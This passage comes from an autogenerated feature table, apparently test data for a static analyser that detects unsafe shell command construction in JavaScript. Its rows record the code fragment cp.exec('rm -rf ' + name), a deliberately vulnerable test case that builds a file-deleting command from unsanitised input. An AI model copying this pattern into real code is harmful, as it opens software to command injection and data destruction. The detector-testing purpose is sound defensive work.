Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:27:199:30 | test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:27:199:30 | test | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:27:199:30 | test | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:27:199:30 | test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | CalleeFlexibleAccessPath | ?.test | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:32:199:35 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:4 | cp | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:4 | cp | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:9 | cp.exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:6:200:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:6:200:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:6:200:9 | exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:6:200:9 | exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:6:200:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:11:200:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:23:200:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:4 | cp | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:4 | cp | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:9 | cp.exec | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 